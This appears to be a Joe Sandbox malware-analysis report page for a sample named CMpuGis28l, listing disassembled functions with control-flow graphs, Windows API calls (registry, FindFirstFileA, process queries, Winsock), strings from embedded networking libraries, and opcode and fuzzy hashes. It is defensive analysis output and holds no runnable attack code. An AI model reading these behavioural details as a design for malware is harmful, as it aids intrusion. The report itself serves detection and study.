                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: FileFind$CallbackDiskDispatcherDriveFirstFolderFreeGlobalInfoKnownMemoryNextPathSpaceStatusSystemTypeUser
                                                        • String ID: @$`
                                                        • API String ID: 2066228396-3318628307
                                                        • Opcode ID: 07e65a6b3d3fdcb97aa2c5344d416aac929faeeaf6131713ead66f42049f1108
                                                        • Instruction ID: a7f4f6f6af3a696efdbc1fb6f4eb6d31dbd9d7b728128a36f5b123e3123c0c46
                                                        • Opcode Fuzzy Hash: 07e65a6b3d3fdcb97aa2c5344d416aac929faeeaf6131713ead66f42049f1108
                                                        • Instruction Fuzzy Hash: C2D1B3B4904309DFCB50EFA8D99469EBBF0BF48354F01896EE99897344E7359A84CF42
                                                        Function 00F729FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1260 f729ff-f72a2f FindFirstFileA 1261 f72a31-f72a36 1260->1261 1262 f72a38 1260->1262 1263 f72a3d-f72a91 call 13f1150 call 13f11e0 RegOpenKeyExA 1261->1263 1262->1263 1268 f72a93-f72a98 1263->1268 1269 f72a9a 1263->1269 1270 f72a9f-f72b0c call 13f1150 call 13f11e0 CharUpperA call 12f8da0 1268->1270 1269->1270 1278 f72b15 1270->1278 1279 f72b0e-f72b13 1270->1279 1280 f72b1a-f72b92 call 13f1150 call 13f11e0 call 12f8e80 call 12f8e70 1278->1280 1279->1280 1289 f72b94-f72ba3 1280->1289 1290 f72bcc-f72c66 QueryFullProcessImageNameA CloseHandle call 12f8da0 1280->1290 1293 f72ba5-f72bae 1289->1293 1294 f72bb0-f72bca call 12f8e68 1289->1294 1300 f72c6f 1290->1300 1301 f72c68-f72c6d 1290->1301 1293->1290 1294->1289 1294->1290 1302 f72c74-f72ce9 call 13f1150 call 13f11e0 call 12f8e80 call 12f8e70 1300->1302 1301->1302 1311 f72dcf-f72e1c call 13f1150 call 13f11e0 CloseHandle 1302->1311 1312 f72cef-f72d49 call 12f8bb0 call 12f8da0 1302->1312 1322 f72e23-f72e2e 1311->1322 1325 f72d4b-f72d63 call 12f8da0 1312->1325 1326 f72d99-f72dad 1312->1326 1323 f72e37 1322->1323 1324 f72e30-f72e35 1322->1324 1327 f72e3c-f72ed6 call 13f1150 call 13f11e0 1323->1327 1324->1327 1325->1326 1333 f72d65-f72d7d call 12f8da0 1325->1333 1326->1311 1342 f72eea 1327->1342 1343 f72ed8-f72ee1 1327->1343 1333->1326 1338 f72d7f-f72d97 call 12f8da0 1333->1338 1338->1326 1344 f72daf-f72dc9 call 12f8e68 1338->1344 1346 f72eef-f72f16 call 13f1150 call 13f11e0 1342->1346 1343->1342 1345 f72ee3-f72ee8 1343->1345 1344->1311 1344->1312 1345->1346
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                        • String ID: 0
                                                        • API String ID: 2406880114-4108050209
                                                        • Opcode ID: 81af068bda3e9e998d8f37ef2e6546f9716e49dd266e72e15859156c95b39e11
                                                        • Instruction ID: e86e95df48833d366bf16120991f6aebe29ed25be7a7b2407c598128344a717e
                                                        • Opcode Fuzzy Hash: 81af068bda3e9e998d8f37ef2e6546f9716e49dd266e72e15859156c95b39e11
                                                        • Instruction Fuzzy Hash: 2DE1C2B0905306DFCB50EF68D99469DBBF4BF44348F01886AE998DB344E7399A849F42
                                                        Function 00F805B0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 377networkCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1650 f805b0-f805b7 1651 f805bd-f805d4 1650->1651 1652 f807ee 1650->1652 1653 f805da-f805e6 1651->1653 1654 f807e7-f807ed 1651->1654 1653->1654 1655 f805ec-f805f0 1653->1655 1654->1652 1656 f805f6-f80620 call f87350 call f770b0 1655->1656 1657 f807c7-f807cc 1655->1657 1662 f8066a-f8068c call fadec0 1656->1662 1663 f80622-f80624 1656->1663 1657->1654 1668 f80692-f806a0 1662->1668 1669 f807d6-f807e3 call f87380 1662->1669 1664 f80630-f80655 call f770d0 call f803c0 call f87450 1663->1664 1694 f8065b-f80668 call f770e0 1664->1694 1695 f807ce 1664->1695 1671 f806a2-f806a4 1668->1671 1672 f806f4-f806f6 1668->1672 1669->1654 1675 f806b0-f806e4 call f873b0 1671->1675 1677 f806fc-f806fe 1672->1677 1678 f807ef-f8082b call f83000 1672->1678 1675->1669 1693 f806ea-f806ee 1675->1693 1683 f8072c-f80754 1677->1683 1691 f80a2f-f80a35 1678->1691 1692 f80831-f80837 1678->1692 1687 f8075f-f8078b 1683->1687 1688 f80756-f8075b 1683->1688 1706 f80700-f80703 1687->1706 1707 f80791-f80796 1687->1707 1689 f8075d 1688->1689 1690 f80707-f80719 WSAEventSelect 1688->1690 1696 f80723-f80726 1689->1696 1690->1669 1703 f8071f 1690->1703 1701 f80a3c-f80a52 1691->1701 1702 f80a37-f80a3a 1691->1702 1697 f80839-f80842 call f86fa0 1692->1697 1698 f80861-f8087e 1692->1698 1693->1675 1700 f806f0 1693->1700 1694->1662 1694->1664 1695->1669 1696->1678 1696->1683 1710 f80847-f8084c 1697->1710 1717 f80882-f8088d 1698->1717 1700->1672 1701->1669 1708 f80a58-f80a81 call f82f10 1701->1708 1702->1701 1703->1696 1706->1690 1707->1706 1711 f8079c-f807c2 call f776a0 1707->1711 1708->1669 1723 f80a87-f80a97 call f86df0 1708->1723 1714 f80a9c-f80aa4 1710->1714 1715 f80852 1710->1715 1711->1706 1714->1669 1715->1698 1719 f80854-f8085f 1715->1719 1721 f80970-f80975 1717->1721 1722 f80893-f808b1 1717->1722 1719->1717 1725 f80a19-f80a2c 1721->1725 1726 f8097b-f80989 call f770b0 1721->1726 1727 f808c8-f808f7 1722->1727 1723->1669 1725->1691 1726->1725 1735 f8098f-f8099e 1726->1735 1733 f808f9-f808fb 1727->1733 1734 f808fd-f80925 1727->1734 1736 f80928-f8093f 1733->1736 1734->1736 1737 f809b0-f809c1 call f770d0 1735->1737 1743 f808b3-f808c2 1736->1743 1744 f80945-f8096b 1736->1744 1741 f809a0-f809ae call f770e0 1737->1741 1742 f809c3-f809c7 1737->1742 1741->1725 1741->1737 1745 f809e8-f80a03 WSAEnumNetworkEvents 1742->1745 1743->1721 1743->1727 1744->1743 1747 f809d0-f809e6 WSAEventSelect 1745->1747 1748 f80a05-f80a17 1745->1748 1747->1741 1747->1745 1748->1747
                                                        APIs
                                                        • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00F80712
                                                        • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00F809DC
                                                        • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00F809FC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: EventSelect$EnumEventsNetwork
                                                        • String ID: multi.c
                                                        • API String ID: 2170980988-214371023
                                                        • Opcode ID: 86d676aa162f9d647eae8603168f97e835771cd4e6ce9201d2fae8bbe755e3e1
                                                        • Instruction ID: 68bb2bacc08606ddf171e8b4a4bbb995f74e82b6977e1b3782ffea8fa9677739
                                                        • Opcode Fuzzy Hash: 86d676aa162f9d647eae8603168f97e835771cd4e6ce9201d2fae8bbe755e3e1
                                                        • Instruction Fuzzy Hash: 40D1BE71A083019BE750EF20CC81BAB77E5BF94358F44882DF98596251EB74E948EB52
                                                        Function 0103B180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1787 103b180-103b195 1788 103b3e0-103b3e7 1787->1788 1789 103b19b-103b1a2 1787->1789 1790 103b1b0-103b1b9 1789->1790 1790->1790 1791 103b1bb-103b1bd 1790->1791 1791->1788 1792 103b1c3-103b1d0 1791->1792 1794 103b1d6-103b1f2 1792->1794 1795 103b3db 1792->1795 1796 103b229-103b22d 1794->1796 1795->1788 1797 103b233-103b246 1796->1797 1798 103b3e8-103b417 1796->1798 1799 103b260-103b264 1797->1799 1800 103b248-103b24b 1797->1800 1805 103b582-103b589 1798->1805 1806 103b41d-103b429 1798->1806 1802 103b269-103b286 call 103af30 1799->1802 1803 103b215-103b223 1800->1803 1804 103b24d-103b256 1800->1804 1815 103b2f0-103b301 1802->1815 1816 103b288-103b2a3 call 103b060 1802->1816 1803->1796 1808 103b315-103b33c call 12f8b00 1803->1808 1804->1802 1810 103b435-103b44c call 103b590 1806->1810 1811 103b42b-103b433 call 103b590 1806->1811 1818 103b342-103b347 1808->1818 1819 103b3bf-103b3ca 1808->1819 1826 103b458-103b471 call 103b590 1810->1826 1827 103b44e-103b456 call 103b590 1810->1827 1811->1810 1815->1803 1836 103b307-103b310 1815->1836 1832 103b200-103b213 call 103b020 1816->1832 1833 103b2a9-103b2c7 getsockname call 103b020 1816->1833 1823 103b384-103b38f 1818->1823 1824 103b349-103b358 1818->1824 1828 103b3cc-103b3d9 1819->1828 1823->1819 1831 103b391-103b3a5 1823->1831 1830 103b360-103b382 1824->1830 1845 103b473-103b487 1826->1845 1846 103b48c-103b4a7 1826->1846 1827->1826 1828->1788 1830->1823 1830->1830 1837 103b3b0-103b3bd 1831->1837 1832->1803 1843 103b2cc-103b2dd 1833->1843 1836->1828 1837->1819 1837->1837 1843->1803 1849 103b2e3 1843->1849 1845->1805 1847 103b4b3-103b4cb call 103b660 1846->1847 1848 103b4a9-103b4b1 call 103b660 1846->1848 1854 103b4d9-103b4f5 call 103b660 1847->1854 1855 103b4cd-103b4d5 call 103b660 1847->1855 1848->1847 1849->1836 1860 103b4f7-103b50b 1854->1860 1861 103b50d-103b52b call 103b770 * 2 1854->1861 1855->1854 1860->1805 1861->1805 1866 103b52d-103b531 1861->1866 1867 103b533-103b53b 1866->1867 1868 103b580 1866->1868 1869 103b578-103b57e 1867->1869 1870 103b53d-103b547 1867->1870 1868->1805 1869->1805 1870->1869 1871 103b549-103b54d 1870->1871 1871->1869 1872 103b54f-103b558 1871->1872 1872->1869 1873 103b55a-103b576 call 103b870 * 2 1872->1873 1873->1805 1873->1869
                                                        APIs
                                                        • getsockname.WS2_32(-00000020,-00000020,?), ref: 0103B2B6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: getsockname
                                                        • String ID: ares__sortaddrinfo.c$cur != NULL
                                                        • API String ID: 3358416759-2430778319
                                                        • Opcode ID: 0baf786e00fd68ff37961abf55e1eb40b6eb76af8c4e69e523d6fb228ab04ed9
                                                        • Instruction ID: 398c9b42d2d707e8d719b4268877d3f3ec76c22669e5cf42f4422087711f9134
                                                        • Opcode Fuzzy Hash: 0baf786e00fd68ff37961abf55e1eb40b6eb76af8c4e69e523d6fb228ab04ed9
                                                        • Instruction Fuzzy Hash: 34C15C716042159FD718DF28C880A6ABBE5AFC8318F04896CE9899B3A1DB35ED45CB81
                                                        Function 00F86FA0 Relevance: 1.8, APIs: 1, Instructions: 261COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 401cabd9675e404c3b810aa9e30981df2467d67bc1a818f37c024a646e453206
                                                        • Instruction ID: da862669e31ce93ca34932db5135341a039e692cb18c470e64806bbaa72b2fd5
                                                        • Opcode Fuzzy Hash: 401cabd9675e404c3b810aa9e30981df2467d67bc1a818f37c024a646e453206
                                                        • Instruction Fuzzy Hash: E391E131A0C7498BD735BA2988947FBB2D5AFC0370F348B2CE8A9421D4E770DC40A782
                                                        Function 0103A8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0102712E,?,?,?,00001001,00000000), ref: 0103A90D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: recvfrom
                                                        • String ID:
                                                        • API String ID: 846543921-0
                                                        • Opcode ID: 4888e0324e4aecd5969f6fde095330e3b5249883dda738b1d9540c2369e7ee5d
                                                        • Instruction ID: 8676290839024183064bb58545ca7f4370c67e643189c894f9a1a9b9acbeb2a9
                                                        • Opcode Fuzzy Hash: 4888e0324e4aecd5969f6fde095330e3b5249883dda738b1d9540c2369e7ee5d
                                                        • Instruction Fuzzy Hash: 07F06D79208308AFD2109F01DC44D6BBBEDFFCD654F05455DF988232118270AE10CAB2
                                                        Function 0102A440 Relevance: 53.6, APIs: 22, Strings: 8, Instructions: 1066registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0102A499
                                                        • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0102A4FB
                                                        • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0102A531
                                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0102AA19
                                                        • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0102AA4C
                                                        • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0102AA97
                                                        • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0102AAE9
                                                        • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0102AB30
                                                        • RegCloseKey.KERNELBASE(?), ref: 0102AB6A
                                                        • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0102AB82
                                                        • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0102AC46
                                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0102AD0A
                                                        • RegEnumKeyExA.KERNELBASE ref: 0102AD8D
                                                        • RegCloseKey.KERNELBASE(?), ref: 0102ADD9
                                                        • RegEnumKeyExA.KERNELBASE ref: 0102AE08
                                                        • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0102AE2A
                                                        • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0102AE54
                                                        • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0102AF63
                                                        • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0102AFB2
                                                        • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0102B072
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: QueryValue$Open$AdaptersAddresses$CloseEnum
                                                        • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                        • API String ID: 4281207131-1047472027
                                                        • Opcode ID: 8b10dedfc922fef1755e235a4d6475680bbeed222f9adddc66a3a307644df719
                                                        • Instruction ID: 75c08579d8821cc2de82b27b53ff7dc604a87cc8281c4d660db97056bae45142
                                                        • Opcode Fuzzy Hash: 8b10dedfc922fef1755e235a4d6475680bbeed222f9adddc66a3a307644df719
                                                        • Instruction Fuzzy Hash: 11728DB1604311EBE720DB24DC81B6BBBE8AF85740F14582CFA85DB291EB75E944CB52
                                                        Function 00FAA550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00FAA832
                                                        Strings
                                                        • @, xrefs: 00FAA8F4
                                                        • bind failed with errno %d: %s, xrefs: 00FAB080
                                                        • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00FAA6CE
                                                        • @, xrefs: 00FAAC42
                                                        • Bind to local port %d failed, trying next, xrefs: 00FAAFE5
                                                        • Name '%s' family %i resolved to '%s' family %i, xrefs: 00FAADAC
                                                        • cf-socket.c, xrefs: 00FAA5CD, 00FAA735
                                                        • Trying %s:%d..., xrefs: 00FAA7C2, 00FAA7DE
                                                        • cf_socket_open() -> %d, fd=%d, xrefs: 00FAA796
                                                        • Could not set TCP_NODELAY: %s, xrefs: 00FAA871
